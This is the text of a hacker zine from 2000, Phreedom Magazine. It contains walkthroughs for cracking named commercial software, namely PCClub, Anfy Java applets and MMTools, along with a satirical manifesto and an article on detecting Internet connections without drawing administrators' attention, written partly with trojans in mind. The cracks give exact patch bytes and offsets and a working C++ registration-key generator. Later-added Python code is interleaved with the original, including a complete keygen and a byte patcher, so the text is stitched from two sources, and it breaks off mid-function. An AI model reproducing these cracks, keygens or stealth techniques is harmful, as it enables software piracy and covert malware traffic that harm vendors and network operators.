You immediately copy upx.exe into the PCClub directory and type at the DOS prompt the magnificent:

   upx.exe -d PCClubShell.exe

   ....
                       Ultimate Packer for eXecutables
                  Copyright (C) 1996, 1997, 1998, 1999
   UPX v0.84        Markus F.X.J. Oberhumer & Laszlo Molnar        Oct 4th 1999

           File size         Ratio      Format      Name
      --------------------   ------   -----------   -----------
   upx: PCClubShell.exe: CantUnpackException: not yet implemented

   Unpacked 1 file: 0 ok, 1 error.

Now that is just the best!!! Do not bother looking for decompressors from other authors, there simply are none :(( But on closer inspection you notice something particularly interesting: the file PCClubRegister.exe does not have the nasty UPX in its header! Now that is a real find. I am definitely curious what exactly happened during the "development" of the application at Softuerna Grupa Burgas, Bulgaria, that this file was left so neglected by UPX !!! :)) Anyway, we now have something to work on, so let's start cracking! :))

After a short disassembly with W32DASM 8.9 we get the desired code. If you start PCClubRegister.exe you will notice the window it shows. Interesting, what kind of UNIQUE PRODUCT NUMBER is that :) Still, I searched the resources of the exe in case the number in question, "587064175", happened to be there, but did not find it. Instead I found the interesting resource "C:\"!!!
After a quick look over the imported functions, one import immediately caught my eye: KERNEL32!GetVolumeInformationA. I searched for it in the code right away and arrived at:

   * Possible StringData Ref from Code Obj ->"C:\"
   |
   :0044595F 687C594400        push 0044597C       // "C:\" is definitely passed as a parameter

   * Reference To: kernel32.GetVolumeInformationA, Ord:0000h
   |
   :00445964 E8FF03FCFF        call 00405D68
   :00445969 85C0              test eax, eax       // checks whether the function succeeded
   :0044596B 7505              jne 00445972
   :0044596D 83C8FF            or eax, FFFFFFFF
   :00445970 EB03              jmp 00445975

   * Referenced by a (U)nconditional or (C)onditional Jump at Address:
   |:0044596B(C)
   |
   :00445972 8B0424            mov eax, dword ptr [esp]   // moves the Volume Serial Number into EAX

   * Referenced by a (U)nconditional or (C)onditional Jump at Address:
   |:00445970(U)
   |
   :00445975 81C414010000      add esp, 00000114   // ESP no longer points to anything useful
                                                   // (Iron's note: this actually tears down the stack frame,
                                                   // releasing the local buffers GetVolumeInformationA filled in)
   :0044597B C3                ret                 // returns from the CALL

Now things are clear. I immediately loaded SoftIce and put a bpx on KERNEL32!GetVolumeInformationA. It turned out that the disk serial number check is done twice: once when the program initializes, to compute the unique number, and once more when checking whether you are a Good Guy or a Bad Cracker :) After starting it I entered some idiotic code, for example "fuck off", and pressed the register button. SoftIce popped up on KERNEL32!GetVolumeInformationA, and after stepping out of kernel32.dll with F11 I was back in the code of PCClubRegister.exe. I followed what happens next. There came the following horrible procedure for computing the "UNIQUE PRODUCT NUMBER" and the registration code:

   :00445653 E8E4020000        call 0044593C       // we come back here with the hard disk's serial number in EAX
   :00445658 8BD8              mov ebx, eax
   :0044565A 8D55F4            lea edx, dword ptr [ebp-0C]
   :0044565D 8BC3              mov eax, ebx
   ............................................................................
Here follow the insanely complex calculations :)) Well, we are not going to write a key generator, so we will skip them :)

   ............................................................................
   :0044575A E809E4FBFF        call 00403B68       // after long torment we reach a CALL to a little
                                                   // procedure that does the check in question
   :0044575F 742B              je 0044578C         // and the essential question: does the actual
                                                   // hard disk number match the one computed from
                                                   // the reg. code? If they do not match we continue with
   :00445761 6A00              push 00000000
   ............................................................................
   :00445787 E9B2000000        jmp 0044583E        // and finally, after a series of unpleasant little
                                                   // procedures, we reach the bye-bye jump

Otherwise we would have reached much better things..... So if we simply replace the conditional jump

   :0044575F 742B              je 0044578C         // meant only for the good "buyers"

with the unconditional

   :0044575F EB2B              jmp 0044578C        // for everyone who wants to register PCClub 1.0

we get to the end!!!

IV. Conclusion

Well, if you feel like it, you can study the "complex calculations" and put together a key generator, but in my opinion it is not worth the effort. This particular program hardly deserves that much attention :)) And if you still think it could be useful to you... well, buy it:

   28 lv per copy for 1 to 10 licenses
   25 lv per copy for more than 11 licenses

Or replace 74 with EB at physical offset 44B57 (the file offset of the je at 0044575F; the displacement byte 2B stays as it is), then run the new PCClubRegister.exe and type whatever you like as a registration code :) You will be congratulated on successfully registering the product.

DaFixer
(C) 2000 Phreedom Magazine


. . . . . . . . . .. . ... . ...............
P L E D G E
before comrade ManiaX Killerian
........... . . . . . . . . . . . . . .
from the workers, engineers and employees of the hacker groups, associations and local organizations in the country

Our beloved comrade ManiaX,

With a feeling of joy and satisfaction we report to you that, as a result of the noble hacker competition and the systematic use of the rich American and Soviet experience, we have honourably kept the pledge given before you for the early fulfilment of the hacker plans for 1999. The collectives of 44 hacker associations fulfilled their annual plan in less than 10 months, and 42 groups in less than 11 months, among them the "Star Gruhtar" plant, the "Solar Eclipse" state industrial enterprise, "Kay" and others.

With the fulfilment of the pledge given before you for 1999, our national economy received from the hacker industrial enterprises 3053 root accounts above the plan. The plan for lowering the cost of production was overfulfilled and savings of 23853 bytes were realized. In execution of the instructions of the Central Committee of the PHM for improving the quality of production, 283 brigades of excellent quality now work in the hacker groups, and 159 hackers received their own quality stamp. The initiative of the Stakhanovite shock-workers CuMeoHoB and Guninski for lowering the cost of production at every production operation is being applied ever more widely and successfully. At the "EXo" factory 23 trojans above the plan were produced in six months.

In 1999 significant successes were achieved in improving the living conditions of the hackers in the country. Over 6538782 leva were spent on cultural and amenity events in the Sliven and Sofia prisons.

Most glorious comrade ManiaX,

Inspired by the successes achieved in the past year, led by our glorious commu^H^H^H^Hhacker party, making use of the rich experience of the American and our own Stakhanovites, we give before you, before the Party and the people, the following pledges for the early fulfilment of the plan for 2000 and for the fulfilment of the five-year plan in 4 years:

   To fulfil the production plan at 105.7 per cent.
   To increase labour productivity by 8.8 per cent above the plan.
   To have 2083 hackers pass through qualification courses.
   To deliver first-class production for 85 per cent of all output, against a planned 75 per cent.
   To overfulfil by 2.5 per cent the norm for the average daily mileage of those running from the cops.
   To haul off and dump 2000 more dumb sysadmins than planned.
   To increase the assortment of exploits, programs and contract work by 20 per cent above the plan.

Dear comrade ManiaX,

Relying on the rich experience from the struggle to fulfil the pledges of 1999, faithful to your instructions not to rest on the successes achieved, we shall strain all our forces to secure a new upswing in hacking and cracking, for the successful fulfilment of the pledges given before you. With this we shall give the national economy above-plan production of 31337 trojans and 73313 exploits. From lowering the cost of production we shall realize 644 GB of savings. To this end we shall wage an even more persistent and insistent struggle for the further improvement of the organization of labour and production, for the strengthening of labour and state discipline. We shall intensify the struggle for good and excellent quality of production. We shall intensify the spread of the innovators' experience in production and improve the qualification of the workers. We shall widely introduce the method of engineer Guninski into our work. We shall wage an even more insistent struggle for the further expansion and introduction into production of the method of Jon Johanson and Muhanov. Following the example of Alan Cox and Linus Torvalds of the Kupavina factory, Helsinki, we shall develop noble hacker competition for the continuous discovery of additional reserves and new possibilities for savings. Standing at their combat post for the interests of the Motherland against its internal and external enemies, the hackers of the production enterprises and branch organizations shall spare no effort to turn the pledges given before you into living deeds.
Long live our Stakhanovites, front-rankers and innovators in production!

Long live our leader and inspirer in the struggle for peace and hacktivism, the glorious PHM, headed by the General Secretary of the Party, comrade EXo!

Long live the Bulgarian-Taiwanese friendship, the source of our victories in the construction of personal electronic computing machines, a guarantee for the independence and freedom of our Motherland!

Long live our Leader and Teacher, the inspirer of all progressive mankind in its struggle for peace and socialism, the great ManiaX Killerian!

The pledge was discussed and adopted at a general meeting of the workers, engineers, technical personnel and employees of the hacker groups, associations and local organizations in the country.

6 February 2000
(C) 2000 Phreedom Magazine


. . . . . . . . . .. . ... . ...............
Detecting InterNet Connections
By ManiaX Killerian
........... . . . . . . . . . . . . . .

There was an article on this topic in PhM20 as well, but it was oriented mainly towards Windows and did not cover several interesting cases, such as VPN. This article is more theoretically oriented, with a few examples.

For our purposes the possible physical network connections of a machine can be divided into two kinds: dial-up (plain dial-up, callback and so on) and LAN connection (Ethernet and so on). Dial-up is the more common one, but the second variant is not to be overlooked because of its possibilities, for example a faster connection and the so-called 'shared' medium, which gives an incredible opportunity for sniffing.

In practice, the connection types one can encounter are the following:

   I. VPN connection.
      I.1. VPN connection with no connection to the Internet at all.
      I.2. VPN connection with some possibility of reaching the Internet.
         I.2.1. Through a direct gateway.
            I.2.1.1 Filtered.
            I.2.1.2 Unfiltered.
         I.2.2. Through masquerading.
            I.2.2.1 Filtered.
            I.2.2.2 Unfiltered.
         I.2.3. Through socks/proxy.
         I.2.4. Through a firewall with a password.
   II. ISP connection
      II.1. ISP connection to a normal provider, without any filters.
      II.2. ISP connection through masquerading.
      II.3. ISP connection with filtering of part of the traffic.
      II.4. ISP connection that lets through only part of the traffic.

The main difference between VPN and ISP connections is that with the former much more attention is paid to security and it is much more likely that the user's traffic is monitored, so that an Internet connection check could alert the network administrators to the possibility that something they would not like is present. That is why I have separated I.2. and II; otherwise they do not differ much.

The possible methods for detecting a connection can be divided into 3 categories: passive, 'stealth' and active. The first involves checking the settings of the local system itself; the second uses network activity that is practically indistinguishable from normal activity; the third involves network activity which, in a VPN, would stand out from the rest, and the program would become easy to detect and irritating to the administrators.

Here I want to take a moment to explain why such an article is needed: because most Internet connection detection is badly written and only generates unnecessary, irritating traffic, which can only get in the way of the network administrators of some VPN that has strict traffic rules and logs every packet that does not obey them. For example, imagine you have written a Napster server which, whenever there is a connection, goes online and announces itself where it should. And that someone who also uses his computer to connect to his company installs it; in that case, sooner or later someone at the company will notice the unnecessary traffic being generated, there will be noise, and the person will remove the program, something that could have been avoided if it simply detected which connection is a real Internet connection and which is not.

So, let us begin with the _PASSIVE METHODS_

These methods generate no network traffic at all and are currently the most used.
The first such method is to check the machine's interface table and look for one whose IP address is not 127.0.0.1. This is partly correct, but it does not solve the whole problem, because it is meant for cases of type I.2.1., I.2.2., II.1. and II.2.

Another possibility is to check whether there is a default route through one of these interfaces. This also does a good job, but only for the case where the machine is on a LAN that is not connected to the Internet and uses some other variant, for example dial-up, for the connection.

Checking how real the Internet connection is by looking at whether the IP address is a real (public) one does not cover all cases either; it misses connections of type I.2.2. and II.2.

A very useful, but very hard to implement, passive detection method is examining the system configuration and watching the user: configured SOCKS servers, configured mailboxes and so on, from which one determines at which moments a connection exists by observing the user's actions, for example when he browses, recording through which connection he is connected and how. The problem here is that it is very hard (perhaps even impossible) to determine exactly when the user is browsing the Internet and when some internal site. One could, for example, check whether he visits more than 3-4 radically different sites, differing in the first octet of the IP address, but here we get into user analysis, which is quite a complex area.

So let us continue with the _STEALTH METHODS_

These methods are much more accurate than the passive ones and can cover a very serious part of the possibilities. They are applied after the passive ones, i.e. once some connection has been detected, these means determine with fairly good accuracy what kind of connection it is.
One such way is to take the DNS server from the system configuration and send it a query (using a UDP socket, not the standard resolver functions) for the NS servers of several domains, e.g. mtv.com, uu.net, internic.net, things that will clearly exist as long as there is a net :). If the server returns some positive answer, we can already be at least 95% sure that we have a connection to the Internet.

We can also check for a working SOCKS or proxy server (based on the local configuration) that could be used for our purposes. Likewise, one can try to open an arbitrary page through the locally configured proxy, e.g. www.msn.com, which every Internet Explorer does by default, or home.netscape.com. One can also capture the password for the proxy/firewall (this should perhaps go under the passive methods) and reuse it, but this exposes the program to the risk of detection (if it is some trojan, for example).

And last remain the _ACTIVE METHODS_

These methods are the easiest to detect, but they guarantee the greatest accuracy, and with them we can also check whether the connection we have can actually do the job for us. For example, if we want to send mail, we can try to connect directly to our SMTP server and see whether the connection goes through or not. We can also try to ping some server that is guaranteed to answer (such as www.mtv.com, which is EXo's favourite for this purpose, or www.internic.net). One can also try connecting to 2-3 sites (in these cases I always prefer root-servers.net) on port 53, which is practically never filtered, and see whether the connection is established.

Instead of a conclusion I can say that none of these methods is perfect. For the purposes of each program several of them can be combined to achieve the optimal result in terms of generated traffic / reliability / inconspicuousness.
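The stealth DNS check described above, as an added Python example (not part of the original article and not the author's code): it builds one raw DNS query for the NS records of a domain, sends it over a UDP socket to the configured server, and parses the reply, returning a positive result only if the answer carries NS records. The packet builder and parser are exercised offline against a reply constructed for the example (the name-server names in it are made up); only send_ns_query() touches the network. Any RCODE other than 0, a mismatched transaction ID or an answer without NS records counts as "no".

```python
# Added example: a "stealth" connectivity probe, one DNS NS query over raw UDP.
import random
import socket
import struct

DNS_TYPE_NS = 2
DNS_CLASS_IN = 1


def build_ns_query(domain, txid):
    """Build a recursive DNS query (RD=1) for the NS records of `domain`."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in domain.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", DNS_TYPE_NS, DNS_CLASS_IN)


def read_name(msg, off):
    """Decode a possibly compressed name at `off`; return (name, next_off)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:              # compression pointer
            if end is None:
                end = off + 2
            off = ((length & 0x3F) << 8) | msg[off + 1]
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)


def parse_ns_answer(msg, expected_txid):
    """Return the NS names in `msg`, or None if it is not a positive answer
    to our query (wrong ID, not a response, RCODE != 0, no NS records)."""
    if len(msg) < 12:
        return None
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    if txid != expected_txid or not (flags & 0x8000) or (flags & 0x000F) != 0:
        return None
    off = 12
    for _ in range(qd):                        # skip the echoed question
        _, off = read_name(msg, off)
        off += 4
    names = []
    for _ in range(an):
        _, off = read_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        if rtype == DNS_TYPE_NS and rclass == DNS_CLASS_IN:
            names.append(read_name(msg, off)[0])
        off += rdlen
    return names or None


def send_ns_query(domain, server, timeout=3.0):
    """One packet out, one packet in: NS names from `server`, or None."""
    txid = random.randrange(0x10000)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_ns_query(domain, txid), (server, 53))
        try:
            reply, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return parse_ns_answer(reply, txid)


def have_internet(server, domains=("mtv.com", "uu.net", "internic.net")):
    """The article's heuristic: any positive NS answer means we are online."""
    return any(send_ns_query(d, server) for d in domains)


def constructed_reply(txid, rcode=0):
    """A reply a resolver could send for 'NS internic.net.' (constructed for
    the example; the two name servers are fictitious)."""
    question = build_ns_query("internic.net", txid)[12:]
    header = struct.pack(">HHHHHH", txid, 0x8180 | rcode, 1, 2, 0, 0)
    ns1 = b"\x02ns\x07example\x03net\x00"      # ns.example.net, starts at offset 42
    ns2 = b"\x03ns2\xC0\x2D"                    # ns2 + pointer to "example.net" at 45
    def rr(rdata):
        return b"\xC0\x0C" + struct.pack(">HHIH", DNS_TYPE_NS, DNS_CLASS_IN, 3600, len(rdata)) + rdata
    return header + question + rr(ns1) + rr(ns2)
```

Usage: `have_internet("192.168.0.1")` with the resolver address taken from the local configuration. The query is indistinguishable from what any resolver does, which is the point of the stealth class; a forged reply from a captive network is the remaining false-positive case, so the active methods still have their place.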
_SOURCES_

The following sources demonstrate some of the methods described.

-- interface_num.sh - checks whether more than one interface is UP ------------
#!/bin/bash
# -w matches the UP flag in the <...> flag list, not LOWER_UP; -c counts lines
if [ `/sbin/ip link | grep -c -w UP` -gt 1 ] ; then
  echo More than one interface UP.
  exit 0
else
  echo Only loopback exists.
  exit 1
fi
-- default_route.sh - checks whether there is a default route -----------------
#!/bin/bash
if /sbin/ip route | grep default > /dev/null ; then
  echo Exists default route.
  exit 0
else
  echo No default route present.
  exit 1
fi
-- dns_test.sh - does a DNS test for a given domain ---------------------------
#!/bin/bash
#
if [ -z "$1" ] ; then
  echo Usage: $0 domain
  exit 2
fi
# dnsquery ships with older BIND; "host -t NS $1." or "dig NS $1." do the same job
if dnsquery "$1." NS 1>/dev/null 2>/dev/null ; then
  echo Test successful
  exit 0
else
  echo Test failed
  exit 1
fi
-------------------------------------------------------------------------------

For the other methods there are existing commands: telnet, to check whether a connection can be opened (in most cases netcat or socket are recommended for scripts); ping and fping, to check whether some machine can be pinged. The scripts can easily be extended if desired so that they check how far one gets through masquerading and so on. Also, some of the scripts require the 'ip' command from the iproute package.

ManiaX Killerian
(C) 2000 Phreedom Magazine


. . . . . . . . . .. . ... . ...............
Cracking Java Applets
By Solar Eclipse
........... . . . . . . . . . . . . . .

Java is a rather interesting language. Few people have dealt with it, but as a concept Java is very interesting. The main difference between conventional languages and Java is that Java is compiled to so-called byte-code, which is then executed by an interpreter (the so-called Java Virtual Machine). The byte code (also called P-code) contains nearly all the information about the program: class, method and field names survive in the class file, and only local variable names and line numbers are dropped unless it was compiled with debug information. This allows full decompilation of Java programs, which in turn makes the cracker's work extremely easy. In this article I will deal with cracking the Java applets of AnfyTeam.
At www.anfyteam.com you can download free versions of the applets and use them to add cool effects to your web page. Unfortunately the free version of the applets has one very important limitation: clicking on the applet pops up a message saying that this is an unregistered version of Anfy. Most web designers will want to use the applets as interactive links, so this nag screen is very irritating. In this article I will start from the position of a cracker experienced with Win32 shareware but completely unfamiliar with Java. When I set about cracking Anfy, I had had no prior contact with Java at all.

Step 1: First look

The applets are archived in a ZIP file. After extracting it we get the applets in separate directories, together with documentation. From the documentation we learn that the applets are fully functional and nag-free when run from the local hard disk. That sounds good: somewhere in the source there must be code that checks where the applet is being run from. The documentation also says that after registration we receive a registration code tied to our domain name. This code is passed as a parameter in the <APPLET> tag in the HTML. That also sounds good: the code is based on the domain, and we can write a keygen. It is good to have some valid code, so that we can see what one looks like. AnfyTeam's page had demonstrations of the applets, and they had no nag screens. Does Anfy have a code? Yes, and it looks like this:

   <param name=regcode value="fskdyjfr-htrdijmgmkp">

Step 2: Decompiling

Time to decompile the applet. After a short walk around the web we find a freeware Java decompiler called Jad. Its use is simple: jad <filename> decompiles the Java applet with the given name. The result is a .JAD file containing the source of the Java applet. This source is, broadly speaking, working Java source and can be compiled with the Java compiler.
Let's look at the source of the BookFlip applet:

   // Decompiled by Jad v1.5.7a. Copyright 1997-99 Pavel Kouznetsov.
   // Jad home page: http://www.geocities.com/SiliconValley/Bridge/8617/jad.html
   // Decompiler options: packimports(3)
   // Source File Name:   bookflip.java
   ...

The interesting thing is that the source contains no ASCII strings whatsoever. The copyright message that the applet displays is missing too. This is strange and needs to be investigated. In many places in the source we find constructs like:

   if(!s1.startsWith(c("\031%\004c<\0364\004ssx\026\017o\177;<F2k/\"H{r>")))
   ...
   s2 = c("><\n\177");
   ...
   if(s2.equalsIgnoreCase(c("><\n\177")) || s3.length() == 0 || s3.equalsIgnoreCase(c("4:\005{p0:\025n")) || s3.equals(c("igQ4,veH+")))

Obviously the decompiler names the string variables s. These strange strings in the source look XORed. Apparently c() is a function that XORs them, or does something similar. Let's look at the function c(): (btw, Java is very close to C++ and the source should not give you any trouble, even if you have never programmed in Java)

   private static String c(String s1)
   {
       char ac[] = s1.toCharArray();
       int i1 = ac.length;
       int j1 = 0;
   label0:
       do
       {
           int k1 = 0;
           ac[j1] ^= 'X';
           do
           {
               j1++;
               k1++;
               if(i1 != j1)
                   switch(k1)
                   {
                   case 1: // '\001'
                       ac[j1] ^= 'U';
                       break;

                   case 2: // '\002'
                       ac[j1] ^= 'f';
                       break;

                   case 3: // '\003'
                       ac[j1] ^= '\032';
                       break;

                   case 4: // '\004'
                       ac[j1] ^= '\034';
                       break;

                   case 5: // '\005'
                       continue label0;
                   }
               else
                   return new String(ac);
           } while(true);
       } while(true);
   }

After a short look we conclude that this code is a dirty, nasty XORer with a rotating key (the ^= operator performs an XOR; the key is the five bytes 'X', 'U', 'f', '\032', '\034', repeated over the string). An exact analysis of the algorithm is not hard, but it would waste our time, and there is no point in it. It is much easier to simply write a small Java program into which we paste the function c().

Step 3: keyc.java

For this we need to download the JDK (Java Development Kit) from sun.com.
There are plenty of Java tutorials, so writing a program that calls a function and prints the result on the screen is not hard. Here is the source:

-- keyc.java ---------------------------------------------------------------
class KeycApp
{
    // copied unchanged from the decompiled applet
    private static String c(String s1)
    {
        char ac[] = s1.toCharArray();
        int i1 = ac.length;
        int j1 = 0;
    label0:
        do
        {
            int k1 = 0;
            ac[j1] ^= 'X';
            do
            {
                j1++;
                k1++;
                if(i1 != j1)
                    switch(k1)
                    {
                    case 1: // '\001'
                        ac[j1] ^= 'U';
                        break;

                    case 2: // '\002'
                        ac[j1] ^= 'f';
                        break;

                    case 3: // '\003'
                        ac[j1] ^= '\032';
                        break;

                    case 4: // '\004'
                        ac[j1] ^= '\034';
                        break;

                    case 5: // '\005'
                        continue label0;
                    }
                else
                    return new String(ac);
            } while(true);
        } while(true);
    }

    // paste any encoded literal from the applet here and read its plaintext
    public static void main(String[] args)
    {
        System.out.println(c("\031%\026vy,u\004c<\0364\004ssx\026\017o\177;<F2k/\"H{r>"));
    }
}
----------------------------------------------------------------------------

As you can see, most of the source is simply copy-pasted from the Java applet we are cracking. As the argument of c() we can pass any string from the applet and see its decrypted form. This makes studying the source code of Anfy considerably easier. The regcode check is done in the function init().

Step 4: public void init()

At the beginning of init() is the following code (the encoded literals are shown here already decoded with c(); note that the protocol literal "><\n\177" decodes to "file", i.e. a page loaded from the local disk):

   s2 = getDocumentBase().getProtocol();
   s3 = getDocumentBase().getHost();
   if(s2.equalsIgnoreCase("file") || s3.length() == 0 || s3.equalsIgnoreCase("localhost") || s3.equals("127.0.0.1"))
   {
       bc = true;
   } else
   {
       ...
   }

Obviously a check is made here whether the applet is started from the local machine. Later the applet checks the flag bc to decide whether to show the nag screen or not. If the applet was not started from the local machine, the registration code is read from the parameter list and checked for correctness:

   s4 = getParameter("regcode");

After that the registered domain name is extracted from the regcode and compared with the real domain.
Step 5: The Algorithm

Analysing the regcode algorithm is a boring task. You need a sheet of paper, a pencil and a print-out of the source code. The main element of the algorithm is something very similar to ROT13. The characters of the domain are shifted by N positions within their range, with N varying. Pseudocode:

   1) If the domain starts with 'www.', the first 4 characters are cut off.
   2) The sum of the ASCII codes of all characters at even positions (counting from 0) is computed and stored in evensum.
   3) The sum of the ASCII codes of all characters at odd positions is computed and stored in oddsum.
   4) The length of the domain is taken mod 7 and the result is stored in mod7.
   5) The length of the domain is taken mod 3 and the result is stored in mod3.
   6) Characters with ASCII codes 48 to 57 (digits) are shifted mod7 positions to the right, wrapping within 48..57.
   7) Characters with ASCII codes 65 to 90 (A-Z) are shifted mod7 positions to the right, wrapping within 65..90.
   8) Characters with ASCII codes 97 to 122 (a-z) are shifted mod7 positions to the right, wrapping within 97..122.
   9) Characters with ASCII codes 45 and 46 ('-' and '.') are swapped (45->46 and 46->45).
   10) After each character, mod7 = mod7 + mod3, and if mod7 is greater than 7, mod7 is set to 1.

The regcode consists of the shifted characters of the domain (the '.' has become a '-' by step 9), followed by evensum and oddsum. Evensum and oddsum are converted to 4-digit decimal numbers and each digit is shifted to the right: evensum by 52, oddsum by 55 (i.e. 52 or 55 is added to the ASCII code of each digit, turning the digits into letters).
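The string decoder of Step 2 and the regcode algorithm of Step 5, as an added Python example (not AnfyTeam's code and not the article's own). decode_c() is a port of the applet's c(); regcode() follows the pseudocode above, with rot() being the in-range rotation the C++ Builder code calls ROT; domain_from_regcode() is the inverse the applet needs in order to compare the registered domain with the real one, and check_regcode() is the applet-side validation. Feeding the literals quoted in Step 2 through decode_c() shows what the applet actually compares against, and regcode("www.anfyteam.com") reproduces the code quoted in Step 1.

```python
# Added example: port of the applet's XOR string decoder and of the regcode
# algorithm described in Step 5, plus its inverse.
XOR_KEY = (0x58, 0x55, 0x66, 0x1A, 0x1C)      # 'X', 'U', 'f', '\032', '\034'


def decode_c(s):
    """Undo c(): XOR each character with the 5-byte key, cycling."""
    return "".join(chr(ord(ch) ^ XOR_KEY[i % len(XOR_KEY)]) for i, ch in enumerate(s))


def rot(code, n, lo, hi):
    """Rotate ASCII `code` by n positions inside [lo, hi], wrapping around."""
    return lo + (code - lo + n) % (hi - lo + 1)


def _shift(domain, direction):
    """Steps 4-10: rotate the characters by the varying amount mod7.
    direction=+1 encodes a domain, -1 undoes it (the '-'/'.' swap is its own
    inverse and mod7/mod3 depend only on the length, which the code keeps)."""
    length = len(domain)
    mod7, mod3 = length % 7, length % 3
    out = []
    for ch in domain:
        code = ord(ch)
        if 48 <= code <= 57:
            code = rot(code, direction * mod7, 48, 57)
        elif 65 <= code <= 90:
            code = rot(code, direction * mod7, 65, 90)
        elif 97 <= code <= 122:
            code = rot(code, direction * mod7, 97, 122)
        elif code == 45:
            code = 46
        elif code == 46:
            code = 45
        out.append(chr(code))
        mod7 += mod3
        if mod7 > 7:
            mod7 = 1
    return "".join(out)


def regcode(domain):
    """Steps 1-10 plus the two checksums, as the registration server does it."""
    dom = domain[4:] if domain.startswith("www.") else domain
    codes = [ord(ch) for ch in dom]
    evensum, oddsum = sum(codes[0::2]), sum(codes[1::2])
    digits = "%04d%04d" % (evensum, oddsum)
    tail = "".join(chr(ord(d) + 52) for d in digits[:4])
    tail += "".join(chr(ord(d) + 55) for d in digits[4:])
    return _shift(dom, +1) + tail


def domain_from_regcode(code):
    """Recover the registered domain: drop the 8 checksum letters, unshift."""
    return _shift(code[:-8], -1)


def check_regcode(code, host):
    """Applet-side validation: the code must be the one for the page's host."""
    host = host[4:] if host.startswith("www.") else host
    return len(code) > 8 and domain_from_regcode(code) == host and regcode(host) == code
```

The inverse works because nothing in the code is secret: the shift amounts are a function of the length, which the code preserves, so a valid code for any domain is as easy to compute as to check; a domain-locked scheme with no server-side secret is a keygen waiting to be written.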
Source code:

   #include <stdio.h>
   #include <string.h>

   // Rotate `ch` by `n` positions within the ASCII range [lo, hi], wrapping
   // around like ROT13. The handler below assumes this helper.
   static char ROT(char ch, int n, int lo, int hi)
   {
       return (char)(lo + (ch - lo + n) % (hi - lo + 1));
   }

   void __fastcall TForm1::Button1Click(TObject *Sender)
   {
       char cbuf[1000];
       char *ac = &cbuf[0];
       int c, i, len, oddsum=0, evensum=0;

       strncpy(ac, aedit->Text.c_str(), 1000);
       cbuf[999] = '\0';                          // strncpy does not always terminate
       if (ac[0] == 'w' && ac[1] == 'w' && ac[2] == 'w' && ac[3] == '.')
           ac += 4;                               // step 1: drop "www."
       len = strlen(ac);

       for (c=0; c<len; c+=2) evensum += ac[c];   // step 2: even positions
       for (c=1; c<len; c+=2) oddsum  += ac[c];   // step 3: odd positions

       int mod7 = len % 7;                        // step 4
       int mod3 = len % 3;                        // step 5
       for (c=0; c<len; c++)
       {
           if (ac[c] >= 48 && ac[c] <= 57)        ac[c] = ROT(ac[c], mod7, 48, 57);
           else if (ac[c] >= 65 && ac[c] <= 90)   ac[c] = ROT(ac[c], mod7, 65, 90);
           else if (ac[c] >= 97 && ac[c] <= 122)  ac[c] = ROT(ac[c], mod7, 97, 122);
           else if (ac[c] == 45) ac[c] = 46;
           else if (ac[c] == 46) ac[c] = 45;
           if ((mod7 = mod7 + mod3) > 7) mod7 = 1; // step 10
       }
       // the two sums as 4 decimal digits each, shifted into letters
       sprintf(&ac[c], "%04d%04d", evensum, oddsum);
       for (i=0; i<4; i++) ac[c++] += 52;
       for (i=0; i<4; i++) ac[c++] += 55;
       bedit->Text = ac;
       return;
   }

This Borland C++ Builder code reads the domain from the aedit component, computes the regcode and shows it in bedit. That's all.

Solar Eclipse
(C) 2000 Phreedom Magazine


. . . . . . . . . .. . ... . ...............
Cracking MMTools
By DaFixer
........... . . . . . . . . . . . . . .

This is my letter to "xavier" explaining how to crack programs that use MMTools (components for Delphi). I did not know that people around the world had been struggling for months to crack this :) MMTools programs want MMKey32.dll in order to run without Delphi started. Well, I wrote my own MMKey32.dll exporting what is needed. With a WinAPI sniffer I saw the names of the procedures, but they are also hardcoded. You will not find the program in question here, but that does not matter, because a universal algorithm for cracking all programs using MMTools is described. It later turned out that for Delphi5 and Delphi3 some of the patterns are different. We solved that by searching for the 'shrink0' strings, then converting the physical address into an RVA, and finally generating the pattern dynamically. It is mov edx, RVA_ADDRESS.
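The patch step itself, as an added Python example (not DaFixer's "smart patcher", not part of the letter that follows, and not the real executables): a small byte patcher that verifies before it writes. It covers both forms used in this issue, a fixed physical offset with known bytes (the PC Club article: 74 2B at 0x44B57 becomes EB 2B) and a byte signature located by searching (the letter below: e.g. 409C00007D05 becomes 409C0000EB05, 740F becomes 9090). The two sample buffers are constructed from the byte sequences quoted in the articles, surrounded by filler, so the patches can be tried offline; PCCLUB_JE_OFFSET stands in for the real 0x44B57.

```python
# Added example: verified in-place byte patching. Each patch checks what is
# really at the target first, so a different build or an already patched
# file is refused instead of silently corrupted.
import shutil


class PatchError(Exception):
    pass


def patch_at(data, offset, expected, replacement):
    """Replace `expected` at `offset` with `replacement` (same length).
    Refuses unless the bytes there are exactly `expected`."""
    if len(expected) != len(replacement):
        raise PatchError("in-place patch must not change the length")
    found = data[offset:offset + len(expected)]
    if found != expected:
        raise PatchError("expected %s at 0x%X, found %s"
                         % (expected.hex(), offset, found.hex()))
    return data[:offset] + replacement + data[offset + len(expected):]


def jcc_to_jmp(data, offset):
    """The classic 'good boy' patch: a short conditional jump (74 JE, 75 JNE,
    7C-7F JL/JGE/JLE/JG) at `offset` becomes EB (JMP short); the
    displacement byte that follows is kept."""
    opcode = data[offset]
    if not (opcode in (0x74, 0x75) or 0x7C <= opcode <= 0x7F):
        raise PatchError("no short conditional jump at 0x%X (found %02X)" % (offset, opcode))
    return patch_at(data, offset, bytes([opcode]), b"\xEB")


def find_all(data, signature):
    hits, start = [], 0
    while True:
        i = data.find(signature, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def patch_signature(data, signature, replacement, allow_multiple=False):
    """Locate `signature` and overwrite it with `replacement`. Refuses on no
    match and, unless allow_multiple, on several matches: a short signature
    can occur by accident in data or in an unrelated routine."""
    hits = find_all(data, signature)
    if not hits:
        raise PatchError("signature %s not found" % signature.hex())
    if len(hits) > 1 and not allow_multiple:
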